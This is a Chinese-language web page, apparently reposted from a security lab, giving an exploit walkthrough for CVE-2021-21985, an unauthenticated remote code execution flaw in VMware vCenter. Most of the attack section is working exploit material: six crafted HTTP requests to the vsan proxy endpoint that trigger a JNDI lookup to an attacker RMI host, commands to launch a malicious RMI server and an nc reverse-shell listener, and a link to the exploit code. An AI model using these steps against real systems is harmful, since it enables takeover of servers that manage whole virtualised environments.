CVE-2021-21985 Vmware vCenter unauth RCE_集群智慧网络安全云
全国客户服务热线:4006-054-001 疑难解答:159-9855-7370(7X24受理投诉、建议、合作、售前咨询),173-0411-9111(售前),155-4267-2990(售前),座机/传真:0411-83767788(售后),微信咨询:543646
企业服务导航

CVE-2021-21985 Vmware vCenter unauth RCE

发布日期:2024-05-24 浏览次数: 专利申请、商标注册、软件著作权、资质办理快速响应热线:4006-054-001 微信:15998557370


CVE-2021-21985 Vmware vCenter unauth RCE

文章来源:Khan安全攻防实验室 VMware vCenter Server是VMware虚拟化管理平台,广泛的应用于企业私有云内网中。通过使用vCenter,管理员可以轻松的管理上百台虚拟化环境,同时也意味着当其被攻击者控制后会造成私有云大量虚拟化环境将被攻击者控制。 可以通过443访问vCenter Server的攻击者可以直接通过请求在目标主机上执行任意代码,并接管目标主机。攻击复杂度低,所需的条件少,不需要用户交互。 漏洞利用 0x01 漏洞点 分析可见: https://attackerkb.com/topics/X85GKjaVER/cve-2021-21985?referrer=home#rapid7-analysis 0x02 漏洞利用 对beans对象进行构造,实现rce。 列表: localizedMessageBundlevsanWorkerThreadFactoryvsanThreadPoolImplvsanServiceBundleActivatorvsanServiceFactoryvsanProviderUtils_setVmodlHelpervsanProviderUtils_setVsanServiceFactoryvsanQueryUtil_setDataServicevsanComponentsProviderImplcapabilityPropertyProviderImplpbmDataProviderImplvsanCapabilityCacheManagervsanCapabilityUtils_setVsanCapabilityCacheManagervsanUtils_setMessageBundlevsanFormatUtils_setUserSessionService 由于Vsphere UI使用的tomcat中间件,可以通过jndi rmi bypass https://github.com/welk1n/JNDI-Injection-Bypass/blob/master/src/main/java/payloads/EvilRMIServer.java 远程执行命令 Step1https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setTargetObject{"methodInput":[null]} Step2https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setStaticMethod {"methodInput":["javax.naming.InitialContext.doLookup"]} Step3https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setTargetMethod{"methodInput":["doLookup"]} Step4 https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/setArguments{"methodInput":[["rmi://attip:1097/ExecByEL"]]} Step5https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/prepare{"methodInput":[]} Step6https://host/ui/h5-vsan/rest/proxy/service/&vsanQueryUtil_setDataService/invoke{"methodInput":[]} 使用方法 启动rmi服务 java -cp JNDI-Injection-Bypass-1.0-SNAPSHOT-all.jar payloads.EvilRMIServer attip  启动reverse shell侦听 nc -lvvp 5555 执行以上payload,得到反向shell  项目地址: https://github.com/xnianq/cve-2021-21985_exp

CVE-2021-21985 Vmware vCenter unauth RCE